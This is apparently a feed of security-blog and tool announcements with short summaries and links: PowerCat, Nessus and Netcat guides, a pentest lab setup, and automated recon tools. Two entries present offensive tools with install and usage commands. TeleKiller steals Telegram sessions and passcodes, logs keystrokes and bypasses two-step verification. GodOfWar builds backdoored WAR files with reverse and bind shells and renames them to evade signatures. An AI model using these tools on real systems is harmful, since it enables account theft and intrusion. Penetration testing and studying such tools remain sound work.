PowerCat - A PowerShell Netcat

The name PowerCat comes from PowerShell Netcat; it is a new version of netcat in the form of a PowerShell script. In this article, we will learn about PowerCat, which is a PowerShell tool for exploiting Windows machines. Table of Content: Requirement & Installations, Testing PowerShell Communication, Bind Shell, Execute Shell, Tunnelling or port forwarding…

Link: https://www.hackingarticles.in/powercat-a-powershell-netcat/

Web Server Lab Setup for Penetration Testing

In this post, we will discuss how to set up our own web server for penetration testing on Ubuntu 18. Ubuntu 18 has been updated with new features.
Table of Content: Requirement, Web Server configuration, Apache, PHP, MySQL, phpMyAdmin, FTP, SSH, Nmap
Requirement: Ubuntu 18.0
Web Server Configuration: The Web server is a program that uses HTTP to serve users with files forming web pages in response to requests transmitted by their HTTP clients. The term Web server can also refer to dedicated computers and apparatuses.
Install Apache: First, we will install the Apache….

Link: https://www.hackingarticles.in/web-server-lab-setup-for-penetration-testing/


PenTestIT RSS Feed
I read a tweet about two days ago and today, MITRE CALDERA 2.0 is out already! If you remember, I wrote briefly about this automated adversary emulation system in my post titled – List of Adversary Emulation Tools. This is a major update and this post is about the changes I personally see in this…

Link: http://pentestit.com/update-mitre-caldera-2-0/

Reverie – Automated Pentest Tools Designed For Parrot Linux

Automated pentest tools designed for Parrot Linux. This tool handles your basic pentesting tasks such as Information Gathering, Security Auditing, and Reporting, doing every task fully automatically.
Usage Guide:
  Download / Clone
    ~# git clone https://github.com/baguswiratmaadi/reverie
  Go inside the reverie dir
    ~# cd reverie
  Give permission to reverie
    ~# chmod 777 *.sh
  Run reverie without install
    ~# ./reverie.sh
  If you want to install reverie
    ~# ./install.sh
Changelog:
  1.0 First Release
  1.1 Fixing Error In Nikto Command Line
Pentest Tools Auto Executed With Reverie: Whois Lookup, DNSwalk, Nmap, Dmitry, Whatweb, wafw00f, Load Balancing Detector, SSLyze, TLSSled, Automater, Nikto, And More Tool Soon
Screenshot: preview of Reverie (auto pentest, tools preview, output result, report in HTML).
Disclaimer: Do not scan government and private IT objects without legal permission. Do At Your Own Risk.

Link: http://feedproxy.google.com/~r/PentestTools/~3/I5j5E3B9o2w/reverie-automated-pentest-tools.html

TeleKiller – A Tool Session Hijacking And Stealer Local Passcode Telegram Windows

A tool for session hijacking and stealing the local passcode of Telegram for Windows.
Features: Session Hijacking, Stealer Local Passcode, Keylogger, Shell, Bypass 2 Step Verification, Bypass Av (Coming Soon)
Installation (Windows):
    git clone https://github.com/ultrasecurity/TeleKiller.git
    cd TeleKiller
    pip install -r requirements.txt
    python TeleKiller.py
Dependency: python 2.7, pyHook, pywin32
Operating Systems Tested: Windows 10, Windows 8.1, Windows 8, Windows 7
Contact: WebSite Ultra Security Team: https://ultrasec.org, Channel Telegram: https://t.me/UltraSecurity
Thanks to: Milad Ranjbar, MrQadir

Link: http://www.kitploit.com/2019/04/telekiller-tool-session-hijacking-and.html

GodOfWar – Malicious Java WAR Builder With Built-In Payloads

A command-line tool to generate war payloads for penetration testing / red teaming purposes, written in ruby.
Features:
  Preexisting payloads (try -l/--list): cmd_get, filebrowser, bind_shell, reverse_shell, reverse_shell_ui
  Configurable backdoor (try --host/--port)
  Control over payload name. To avoid malicious name after deployment to bypass URL name signatures.
Installation:
    $ gem install godofwar
Usage:
    $ godofwar -h
    Help menu:
       -p, --payload PAYLOAD    Generates war from one of the available payloads. (check -l/--list)
       -H, --host IP_ADDR       Local or Remote IP address for the chosen payload (used with -p/--payload)
       -P, --port PORT          Local or Remote Port for the chosen payload (used with -p/--payload)
       -o, --output [FILE]      Output file and the deployment name. (default is the payload original name. check '-l/--list')
       -l, --list               list all available payloads.
       -h, --help               Show this help message.
Example: list all payloads
    $ godofwar -l
    ├── cmd_get
    │   └── Information:
    │       ├── Description: Command execution via web interface
    │       ├── OS: any
    │       ├── Settings: {"false"=>"No Settings required!"}
    │       ├── Usage: http://host/cmd.jsp?cmd=whoami
    │       ├── References: ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
    │       └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
    ├── filebrowser
    │   └── Information:
    │       ├── Description: Remote file browser, upload, download, unzip files and native command execution
    │       ├── OS: any
    │       ├── Settings: {"false"=>"No Settings required!"}
    │       ├── Usage: http://host/filebrowser.jsp
    │       ├── References: ["http://www.vonloesch.de/filebrowser.html"]
    │       └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
    ├── bind_shell
    │   └── Information:
    │       ├── Description: TCP bind shell
    │       ├── OS: any
    │       ├── Settings: {"port"=>4444, "false"=>"No Settings required!"}
    │       ├── Usage: http://host/reverse-shell.jsp
    │       ├── References: ["Metasploit – msfvenom -p java/jsp_shell_bind_tcp"]
    │       └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
    ├── reverse_shell_ui
    │   └── Information:
    │       ├── Description: TCP reverse shell with a HTML form to set LHOST and LPORT from browser.
    │       ├── OS: any
    │       ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
    │       ├── Usage: http://host/reverse_shell_ui.jsp
    │       ├── References: []
    │       └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
    ├── reverse_shell
    │   └── Information:
    │       ├── Description: TCP reverse shell. LHOST and LPORT are hardcoded
    │       ├── OS: any
    │       ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
    │       ├── Usage: http://host/reverse_shell.jsp
    │       ├── References: []
    │       └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell
Example: generate payload with LHOST and LPORT
    godofwar -p reverse_shell -H -P 9911 -o puppy
  After deployment, you can visit your shell on (http://host:8080/puppy/puppy.jsp)
Contributing:
  1. Fork it ( https://github.com/KINGSABRI/godofwar/fork ).
  2. Create your feature branch (git checkout -b my-new-feature).
  3. Commit your changes (git commit -am 'Add some feature').
  4. Push to the branch (git push origin my-new-feature).
  5. Create a new Pull Request.
Add More Backdoors: to contribute by adding more backdoors:
  1. create a new folder under payloads directory.
  2. put your jsp file under the newly created directory (make it the same directory name).
  3. update payloads_info.json file with:
     description.
     supported operating system (try to make it universal though).
     configurations: default host and port.
     references: the payload origin or its creator credits.

Link: http://feedproxy.google.com/~r/PentestTools/~3/48DUIB_ttEQ/godofwar-malicious-java-war-builder.html

Beginner’s Guide to Nessus

In this article, we will learn about Nessus, which is a network vulnerability scanner. There are various network vulnerability scanners, but Nessus is one of the best because of its most successful GUI. Therefore, it is widely used in multiple organizations. The tool was developed by Renaud Deraison in the year 1998. Table of Content…

Link: https://www.hackingarticles.in/beginners-guide-to-nessus/

Kage: Graphical User Interface for Metasploit

Kage is a GUI for Metasploit RPC servers. It is a good tool for beginners to understand the working of Metasploit, as it generates payloads and lets you interact with sessions. As this tool is still in the process of being developed, so far it only supports windows/meterpreter and android/meterpreter. For it to work, you should have…

Link: https://www.hackingarticles.in/kage-graphical-user-interface-for-metasploit/

Osmedeus – Fully Automated Offensive Security Tool For Reconnaissance And Vulnerability Scanning

Osmedeus allows you to automatically run a collection of awesome tools for reconnaissance and vulnerability scanning against the target.
How to use: If you have no idea what you are doing, just type the command below or check out the Advanced Usage.
    ./osmedeus.py -t example.com
Installation:
    git clone https://github.com/j3ssie/Osmedeus
    cd Osmedeus
    ./install.sh
  This install only focuses on Kali Linux; check the Wiki page for more install options.
Features:
  Subdomain Scan.
  Subdomain TakeOver Scan.
  Screenshot the target.
  Basic recon like Whois, Dig info.
  IP Discovery.
  CORS Scan.
  SSL Scan.
  Headers Scan.
  Port Scan.
  Vulnerable Scan.
  Separate workspaces to store all scan output and detailed logging.
  REST API.
  SPA Web UI.
  Slack notifications.
Contact: @j3ssiejjj

Link: http://feedproxy.google.com/~r/PentestTools/~3/DCeXRDXo4J0/osmedeus-fully-automated-offensive.html

Comprehensive Guide on Netcat

This article will provide you with a basic guide to Netcat and how to get a session from it using different methods. Table of Contents: Introduction, Features, Getting started with NC, Connecting to a Server, Fetching HTTP header, Chatting, Creating a Backdoor, Verbose Mode, Save Output to Disk, Port Scanning, TCP Delay Scan, UDP Scan…

Link: https://www.hackingarticles.in/comprehensive-guide-on-netcat/